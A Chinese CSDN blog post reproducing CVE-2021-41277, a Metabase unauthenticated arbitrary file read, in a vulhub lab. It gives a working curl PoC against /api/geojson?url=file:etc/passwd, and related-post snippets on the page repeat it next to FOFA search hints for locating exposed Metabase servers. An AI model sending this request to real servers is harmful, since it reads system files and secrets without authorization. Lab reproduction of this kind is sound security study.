复现vulhub中Metabase任意文件读取漏洞(CVE-2021-41277)

最新推荐文章于 2024-05-17 15:33:52 发布
最新推荐文章于 2024-05-17 15:33:52 发布
阅读量415 收藏 5
点赞数 8
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YX_zjp/article/details/138340755
版权

漏洞描述:

Metabase是一个开源的数据分析平台。在其0.40.0到0.40.4、1.0.0 <= Metabase version < 1.40.5版本中,GeoJSON URL验证功能存在远程文件读取漏洞,未授权的攻击者可以利用这个漏洞读取服务器上的任意文件,包括环境变量等。

影响范围:

Metabase version < 0.40.5

1.0.0 <= Metabase version < 1.40.5

 环境说明:

使用腾讯云轻量服务器安装vulhub

系统:ubuntu20.04 

漏洞复现:

启动漏洞环境和查看端口

1、进入/vulhub/metabase/CVE-2021-41277目录,使用命令启动漏洞环境:

2、服务启动后,访问`http://your-ip:3000`可以查看到Metabase的安装引导页面,填写初始账号密码,并且跳过后续的数据库填写的步骤即可完成安装:

使用poc复现

/api/geojson?url=file:etc/passwd

只需要使用CURL即可简单地复现这个漏洞:

curl -v http://your-ip:3000/api/geojson?url=file:etc/passwd

可见,`/etc/passwd`已经被成功读取:

参考链接:

- <https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr>

- <https://github.com/tahtaciburak/CVE-2021-41277>

YX_zjp
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Metabase CVE-2021-41277 信息泄露漏洞
小小猪的博客
12-04 471
Metabase CVE-2021-41277 信息泄露漏洞 漏洞简介: Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。 FOFA搜索app="Metabase": POC {{BaseURL}}/api/geojson?url=file:/etc/passwd .
Metabase可视化BI系统部署安装及简单使用
kanlon的博客
05-24 3361
简单介绍metabase的安装部署及简单使用
Metabase 安装和使用教程
最新发布
云原生实验室
05-17 1981
本文全面介绍了开源数据分析平台 Metabase,从功能特性到应用场景,从安装部署到使用操作,深入探讨了 Metabase 在企业数据分析的方方面面。Metabase 凭借其灵活的部署方式、强大的数据连接能力、直观的可视化查询界面、精美的仪表盘展示以及细粒度的权限管控等特性,可以帮助企业快速搭建起一套自助式的数据分析平台。无论是管理层、业务人员、运营专家还是数据分析师,都能在 Metabase 找到适合自己的数据分析方式。
Metabase 信息泄露漏洞CVE-2021-41277)——漏洞
W小哥
11-24 2976
一、漏洞简介 metabase 是一个简单、开源的数据分析平台。 CVE-2021-41277 在受影响的版本,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息。 该漏洞CVSS评分:9.9,危害等级:严重 二、影响版本 影响版本: metabase version < 0.40.5 metabase version >= 1.0.0, < 1
vulhub系列】CVE-2021-41277 Metabase 信息泄露漏洞
Wiofgb的博客
10-01 1020
CVE-2021-41277 Metabase 信息泄露漏洞
Metabase 使用指南
FesonX的博客
06-26 5261
一. 为什么从 ELK 迁移到 Metabase + OLAP 1.1 ELK 的问题 扩展性不强:Kibana 只能应用在 ElasticSearch 上 管理不便:在阿里云等平台,一个 ElasticSearch 集群对应一个 Kibana,难以统一管理 开发成本:无法将图表嵌入到其他应用,需要二次开发图形展示 性能一般:ElasticSearch 擅长全文搜索,在数据分...
metabase-google-sheets-add-on:将配置数据库问题直接导入到Google表格
04-29
元数据库Google表格插件 此Google表格插件通过使用将数据库问题的结果导入到Google表格。 它具有用户可以访问的两个主要... 首次部署时,请记住在Google脚本项目文件设置以下ENV变量,方法是转到文件->项目属性:
metabase-compose:使用compose运行Metabase的dockerized解决方案
02-05
"metabase-compose"项目是将Metabase集成到Docker Compose环境的实践,它简化了Metabase的部署过程。使用这个解决方案,用户无需手动配置服务器环境,只需要运行`docker-compose`命令即可启动包含Metabase在内的...
metabase-datomic:Metabase的Datomic驱动程序
02-05
要获得基于REPL的工作流,请对metabasemetabase-datomic进行git clone,以使它们位于同级目录 $ git clone git@github.com:metabase/metabase.git $ git clone git@github.com:plexus/metabase-datomic.git $ ...
mara-metabase:从Python配置数据库的配置和架构同步
05-24
玛拉元数据库 ... 运行make setup-metabase将下载一个Metabase jar文件,运行数据库迁移,添加一个admin用户并创建到数据仓库的数据库连接。 然后,运行make run-metabase将在端口3000上启动Metabase
metabase-cubejs-driver:将配置数据库与Cube.js连接
01-29
这必须在Cube.js而不是在Metabase完成。 安装 要求 Metabase v0.35.0或更高版本 获取驱动程序 下载 从下载。 使用Docker进行构建 创建docker映像: make docker 构建驱动程序: make build 不使用Docker进行...
metabase详细使用教程
热门推荐
m0_51218434的博客
01-08 2万+
Metabase 使用目录1. 简介及安装使用1.1. metabase简介1.2. 安装步骤2. Getting started2.1.2.2.3. Troubleshooting and getting help3.1.3.2.3.3. 1. 简介及安装使用 1.1. metabase简介 metabase主要功能创建数据集、在线可视化分析、生成分析图表、构造dashboard、定时任务报表、数据分析模型、订阅发布、分享、安全验证、权限管理、任务管理等等优势。 官网学习地址:metabase参考文档
Metabase学习教程:入门-1
saprrows的博客
11-08 1998
您可以通过筛选和汇总查询的结果,将这些探索保存为新查询,并将查询添加到仪表板但是我们已经超越了自己;Metabase查询以及该查询结果以及这些结果的可视化和格式化(即使该可视化只是一个表格). 查询有标题、ID和唯一的URL,您可以制并与他人共享。在过滤器,我们点击添加过滤器以缩小答案范围按钮,我们将选择小计作为柱在下拉菜单,将“等于”更改为“大于”,在输入字段输入40,然后单击添加筛选器.如果我们想以表格的形式检查结果,可以单击页面底部心的小开关,从图表切换到数据表,然后再切换回来。
Metabase介绍
shine
08-13 1万+
介绍 metabase是一款半开源的BI分析工具,开发语言clojure+js为主。 官网:https://www.metabase.com/可以利用Metabase进行数据分析,数据可视化,报表生成等。 安装 下载metabase,用jvm运行 初始化 创建用户、新增数据库略。。 支持的输入数据库 metabase主要功能创建数据集、在线可视化分析、生成分析图表、构造d...
Metabase学习教程:系统管理-6
weixin_38030820的博客
12-05 1001
Metabase的弹性部署
漏洞分析|Metabase 代码执行漏洞CVE-2023-38646):H2 JDBC 深入利用
m0_46699477的博客
07-28 1867
利用 TRIGGER + DefineClass 完整的实了 JAVA 代码执行和漏洞回显。
CVE-2021-41277——Metabase 信息泄露漏洞
LiBai'S BLOG
11-21 1万+
Metabase 信息泄露漏洞漏洞简介FOFA语法EXP漏洞测试漏洞 漏洞简介 Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。 CNNVD编号:CNNVD-202111-1565 危害等级: 超危 CVE编号: CVE-2021-41277 FOFA语法 app="Metabase
metabase部署与实践
m0_60125201的博客
05-06 1935
本博客简要介绍了metabase这个BI工具,使用两种方法来部署metabase,并简单介绍了metabase的使用。
Metabase 文版本
07-20
Metabase 目前没有官方的文版本,但是你可以通过一些方法来实 Metabase文化: 1. 用户界面翻译:你可以通过修改 Metabase 的前端代码,将用户界面的文本翻译成文。这涉及到编辑前端代码的文本字符串,并将其替换为文翻译。请注意,这需要一定的前端开发经验。 2. 数据库字段翻译:Metabase 在展示数据库字段名称时,默认使用的是字段的原始名称。你可以通过在数据库为字段添加文注释或别名来实字段名称的文化。这样,在 Metabase 查看数据时,字段名称将显示为你设置的文名称。 请注意,上述方法都需要对 Metabase 的代码进行修改或数据库操作,因此在进行任何更改之前,请确保备份相关文件和数据,并仔细阅读 Metabase 的文档和社区讨论,以避免潜在的问题和错误。 此外,Metabase 社区也有一些用户根据自己的需求创建了非官方的文版本或翻译项目。你可以在 Metabase 的官方论坛或第三方社区搜索相关资源,看是否有其他用户分享了文化的解决方案。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值